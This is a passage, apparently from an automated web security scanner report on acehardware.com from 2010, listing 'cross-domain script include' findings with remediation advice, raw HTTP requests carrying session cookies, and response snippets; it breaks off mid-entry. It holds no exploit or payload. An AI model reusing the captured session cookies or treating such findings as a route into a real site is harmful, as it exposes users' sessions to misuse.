<a href="/product/index.jsp?productId=3388719" onclick="window.location.href='/product/index.jsp?productId=3388719&clickid=body_rv_img';return false;"><img SRC="http://ACE.imageg.net/graphics/product_images/pACE3-5463990t50.jpg" WIDTH="50" HEIGHT="50" alt=' Monster&reg; Screen Clean Video Display Cleaning Kit (126634) - Ace Hardware' title=' Monster&reg; Screen Clean Video Display Cleaning Kit (126634) - Ace Hardware' border="0"/></a>
...[SNIP]...
<a href="/history/index.jsp"><img src="http://ACE.imageg.net/images/recentlyViewed_btnLN.gif" width="57" height="11" alt="Show All Recently Viewed" border="0" /></a>
...[SNIP]...
<div><img src="http://ACE.imageg.net/images/pixel.gif" width="1" height="10" border="0"></div>
...[SNIP]...
<div><img src="http://ACE.imageg.net/images/pixel.gif" width="1" height="10" border="0"></div>
...[SNIP]...
<div><img src="http://ACE.imageg.net/images/pixel.gif" width="1" height="7px" border="0"></div>
...[SNIP]...
<div class="pTB10 pR10"><img align=absmiddle src=http://ACE.imageg.net/images/promo_savingsalert_lg.gif width=125 height=20 border=0 align=absmiddle> : With a regular price of $239.99 and an online price of $169.99, you save $70. Plus, get free shipping to your local Ace! (<a href="javascript:showCustomPopUp('/promo/index.jsp?promoId=11049160','pro
...[SNIP]...
<div class="mL10 mB10">
                       <img class="dB fR pR t1- l1" src="http://ACE.imageg.net/images/bucket_tr_navigation.gif" width="11" height="11" alt="" border="0" />


                       <div class="pB10 pT1">
...[SNIP]...
<a href="/family/index.jsp?categoryId=1259412" onclick="window.location.href='/family/index.jsp?categoryId=1259412&clickFrom=Home%3AFeatured+Products';return false;" class="aNoUnderline">
                               <img src="http://ACE.imageg.net/images/back_arrow.gif" border="0"></a>
...[SNIP]...
<a href="/product/index.jsp?productId=11085506" onclick="window.location.href='/product/index.jsp?productId=11085506&clickFrom=Home%3AFeatured+Products';return false;" class="prodC5"><img src="http://ACE.imageg.net/images/prod_arrowleft.gif" width="3" height="5" alt="" border="0" />&nbsp;Prev item</a>
...[SNIP]...
<a href="/product/index.jsp?productId=4356201" onclick="window.location.href='/product/index.jsp?productId=4356201&clickFrom=Home%3AFeatured+Products';return false;" class="prodC5">Next item&nbsp;<img src="http://ACE.imageg.net/images/prod_arrowright.gif" width="3" height="5" alt="" border="0" /></a>
...[SNIP]...
<a href='javascript:printProduct();'><img class="dB" src="http://ACE.imageg.net/images/prod_btn_printthispage_ace.gif" width="163" height="24" alt="print this product page" border="0" /></a>
...[SNIP]...
<a href="javascript:showCustomPopUp('../emailAFriend/index.jsp?productId=4356432','emailfriend','width=480,height=578,toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no')">
                       
                           <img class="dB" src="http://ACE.imageg.net/images/prod_btn_emailthispage_ace.gif" width="163" height="24" alt="email this page to a friend" border="0" /></a>
                           <img class="dB pA t15 l13-" src="http://ACE.imageg.net/images/bucket_bl_navigation.gif" width="11" height="10" alt="" border="0" />
                           </div>
...[SNIP]...
<a href="javascript:verifyFields('yes',document.orderForm);"><img id="additemtocart1" class="b0" name="addtocart"
src="http://ACE.imageg.net/images/prod_btn_addtocart.gif" width="167" height="30" alt="Add to Cart" border="0" />
</a>
...[SNIP]...
<div class="fL w218 h58"><img src="http://ACE.imageg.net/images/addtocart_nofreeship.gif" border=0 /></div>
...[SNIP]...
<a href="javascript:showCustomPopUp('../helpdesk/popup.jsp?display=payment&subdisplay=bml','getfile1','width=500,height=500,toolbar=no,status=no,menubar=no,scrollbars=yes,resizable=yes');" ><img src="http://ACE.imageg.net/images/addtocart_bml.gif" alt="Bill Me Later" border="0" />
</a>
...[SNIP]...
<div><img src="http://ACE.imageg.net/images/pixel.gif" border="0" height="5" width="1"></div>
...[SNIP]...
<div class="w144 h21 prodBorder3l prodBorder3r mT10"><img class="dB" src="http://ACE.imageg.net/images/prod_title_productdetails.gif" width="118" height="21" alt="Product Details" border="0" /></div>
...[SNIP]...
<td bgcolor=#eaeaea><img src=http://ACE.imageg.net/images/pixel.gif width=1 height=1 border=0></td>
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

       <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167&browse_products=4356432' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!-- end sitebg -->

   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />
   <style>
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 12 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.acehardware.com/affiliate/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /affiliate/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /affiliate/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:42 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70811
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZo
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/include/store.css" />
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.2. http://www.acehardware.com/cart/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /cart/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cart/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:17 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 86769
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/DF_ACE_main.css" />
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.3. http://www.acehardware.com/corp/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /corp/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corp/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:41 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 69058
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
</title>
   <script type="text/javascript" src="http://ACE.imageg.net/include/corp.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.4. http://www.acehardware.com/helpdesk/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /helpdesk/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /helpdesk/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:23 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 80640
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
</SCRIPT>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.5. http://www.acehardware.com/home/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/index.jsp?rdir=1A HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/product/index.jsp?productId=3388719
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; rvp=3388719:; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; __g_c=w%3A1%7Cb%3A2%7Cr%3Ahttp%24*%24//www.acehardware.com/product/index.jsp%3FproductId%3D3388719_1___1293636694705%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_pers=%20s_lastvisit%3D1293636628457%7C1388244628457%3B%20s_nr%3D1293636701994%7C1296228701994%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293638502001%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":2,"to":3.9,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":2,"s":false,"e":1}},"cd":0,"sd":0,"f":1293636697249}; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:20:02 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />-->
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<!-- End of DoubleClick Spotlight Tag: Please do not remove-->
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</div>

               
                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.6. http://www.acehardware.com/info/lawnGarden.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /info/lawnGarden.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /info/lawnGarden.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:33 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 71391
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZo
...[SNIP]...
</title>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.7. http://www.acehardware.com/infodept/iskills.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /infodept/iskills.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /infodept/iskills.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 104542
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


